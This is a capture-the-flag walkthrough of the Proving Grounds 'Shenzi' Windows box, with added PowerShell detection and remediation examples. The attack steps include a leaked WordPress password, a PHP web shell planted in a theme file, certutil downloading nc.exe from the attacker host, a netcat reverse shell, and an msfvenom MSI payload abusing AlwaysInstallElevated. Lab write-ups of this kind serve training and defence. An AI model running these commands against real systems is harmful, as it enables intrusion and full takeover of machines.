Shenzi

Writeup for Shenzi from offsec Proving Grounds

Information Gathering

sudo ./nmapAutomator.sh 192.168.85.55 all

Service Enumeration

SMB (Port 445)

We can list the shares to see what share names are available.

We can then download all the files to see if there is anything useful.

Passwords.txt contains many credentials which we can save for later.

Notice that there are WordPress credentials. We can thus run gobuster on the webserver to see if there are any interesting directories.

HTTP (Port 80)

It looks like a basic XAMPP server.

We can run gobuster.

There is a phpmyadmin directory but we can't really access it.

After more digging and some clever brute-forcing, I tried the /Shenzi directory and we get this page.

Since we know this is a WordPress site, we can try the /wp-admin/ directory and we get this login page.

From our earlier enumeration of the SMB service, we know that the login credentials are admin:FeltHeadwallWight357. We try these credentials, and we are authenticated.

Exploit

Here, we can navigate to Theme Editor under the Appearance tab, which lets us modify the theme's PHP files directly.

We copy the source code from https://github.com/artyuum/Simple-PHP-Web-Shell/blob/master/index.php and paste it into the 404.php file. This gives us a web shell whenever the site returns a 404 error, or whenever we navigate to 404.php directly.

Then, we navigate to /404.php or any other directory that doesn't exist, and we get our web shell.

Next, let's transfer nc.exe to the target machine so that we can use it to gain a reverse shell.

cmd.exe /c certutil -urlcache -split -f http://192.168.49.85:80/opt/windows_nc/nc.exe nc.exe

Next, let's get a reverse shell.

We use the following command in our PHP Web Shell:

nc.exe -e cmd 192.168.49.85 443
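Both of the steps above (certutil fetching nc.exe from the attacker's host, then nc.exe -e spawning a shell) leave a distinctive process-creation trail, and the parent of both is the web server. The following is an added example, not part of the original writeup: a small PowerShell detection pass over constructed records shaped like Sysmon Event ID 1 fields (Image, ParentImage, CommandLine, User). The records, the host name SHENZI, the user names and the local paths are assumptions made up for the example; in a real deployment the records would come from Get-WinEvent against the Sysmon operational log.

```powershell
# Added example (not from the original writeup). Constructed process-creation
# records shaped like Sysmon Event ID 1; host/user/path values are made up.
$sampleEvents = @(
    [pscustomobject]@{ Image = 'C:\Windows\System32\certutil.exe'; ParentImage = 'C:\xampp\apache\bin\httpd.exe';
                       CommandLine = 'certutil -urlcache -split -f http://192.168.49.85:80/opt/windows_nc/nc.exe nc.exe'; User = 'SHENZI\shenzi' },
    [pscustomobject]@{ Image = 'C:\xampp\htdocs\shenzi\nc.exe'; ParentImage = 'C:\Windows\System32\cmd.exe';
                       CommandLine = 'nc.exe -e cmd 192.168.49.85 443'; User = 'SHENZI\shenzi' },
    [pscustomobject]@{ Image = 'C:\Windows\System32\certutil.exe'; ParentImage = 'C:\Windows\explorer.exe';
                       CommandLine = 'certutil -verify cert.cer'; User = 'SHENZI\admin' },
    [pscustomobject]@{ Image = 'C:\Windows\System32\msiexec.exe'; ParentImage = 'C:\Windows\System32\cmd.exe';
                       CommandLine = 'msiexec /quiet /qn /i C:\Users\shenzi\shell.msi'; User = 'SHENZI\shenzi' }
)

function Test-SuspiciousProcess {
    # Returns the list of reasons a single record looks suspicious (empty if none).
    param([Parameter(Mandatory)] $Event)
    $findings = @()
    $cmd = $Event.CommandLine

    # certutil used as a downloader: -urlcache together with a URL on the command line
    if ($Event.Image -match '\\certutil\.exe$' -and $cmd -match '-urlcache' -and $cmd -match 'https?://') {
        $findings += 'certutil used to download a remote file'
    }
    # Anything spawned by the web server process is worth a look (web shell activity)
    if ($Event.ParentImage -match '\\(httpd|w3wp|php-cgi|nginx)\.exe$') {
        $findings += 'process spawned by the web server'
    }
    # netcat-style "-e cmd" / "-e powershell" reverse shell invocation
    if ($cmd -match '\bnc(64)?\.exe\b.*\s-e\s+(cmd|powershell)') {
        $findings += 'netcat -e reverse shell'
    }
    # msiexec installing a package from outside Windows / Program Files (see Privesc section)
    if ($Event.Image -match '\\msiexec\.exe$' -and $cmd -match '\s/i\s+(?!C:\\(Windows|Program Files))') {
        $findings += 'msiexec installing a package from a user-writable location'
    }
    return ,$findings
}

foreach ($e in $sampleEvents) {
    $hits = Test-SuspiciousProcess -Event $e
    if ($hits.Count -gt 0) {
        "[ALERT] $($e.User) : $($e.CommandLine)"
        $hits | ForEach-Object { "        - $_" }
    }
}
```

On the constructed records, the first two entries and the msiexec entry are flagged; the plain certutil -verify run by an interactive user is not. The parent-process check is the most durable of the four: renaming nc.exe or switching download tools does not change the fact that httpd.exe should not be spawning cmd.exe or certutil.exe.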

Privesc

Next, we can transfer winPEAS onto the target machine and run it.

From winPEAS, we notice these 2 registry values are enabled (value is 0x1). This means users of any privilege level can install (execute) *.msi files as NT AUTHORITY\SYSTEM.

Credits - https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
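The two values winPEAS flags are AlwaysInstallElevated under the Windows Installer policy key in both HKLM and HKCU, and the policy only takes effect when both are set to 1. The following is an added example, not from the original writeup: a PowerShell script that reports the state of both values and, when run with -Remediate from an elevated prompt, sets them to 0 (the same effect as choosing Disabled for "Always install with elevated privileges" in the Group Policy editor). The key paths are the documented policy locations; everything else is the example's own.

```powershell
# Added example (not from the original writeup): audit and optionally clear
# the AlwaysInstallElevated policy. Run from an elevated PowerShell prompt.
param([switch]$Remediate)

# Documented policy locations; the policy is active only when BOTH values are 1.
$policyPaths = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevatedState {
    # One row per hive: the raw value (null if absent) and whether it is enabled.
    $state = foreach ($path in $policyPaths) {
        $value = $null
        if (Test-Path $path) {
            $value = (Get-ItemProperty -Path $path -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        }
        [pscustomobject]@{ Path = $path; Value = $value; Enabled = ($value -eq 1) }
    }
    return $state
}

function Test-AlwaysInstallElevated {
    # True only if the machine AND the user policy values are both 1.
    $enabled = @(Get-AlwaysInstallElevatedState | Where-Object Enabled)
    return ($enabled.Count -eq $policyPaths.Count)
}

function Disable-AlwaysInstallElevated {
    foreach ($path in $policyPaths) {
        if (Test-Path $path) {
            # 0 is what the Group Policy editor writes for "Disabled".
            Set-ItemProperty -Path $path -Name AlwaysInstallElevated -Value 0 -Type DWord
        }
    }
}

Get-AlwaysInstallElevatedState | Format-Table -AutoSize
if (Test-AlwaysInstallElevated) {
    Write-Warning 'AlwaysInstallElevated is active: any user can run an MSI as SYSTEM.'
    if ($Remediate) {
        Disable-AlwaysInstallElevated
        'Both values set to 0; re-run without -Remediate to confirm.'
    }
} else {
    'AlwaysInstallElevated is not active on this host.'
}
```

Note that the HKCU value is per user, so a clean result for the account running the audit does not rule out another profile having it set; checking the HKLM value across the fleet (or enforcing Disabled via GPO) is the reliable fix.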

Let's generate a .msi reverse shell file first.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.85 LPORT=21 -f msi > ~/pg/shenzi/shell.msi

After transferring the file and running it, we get SYSTEM.
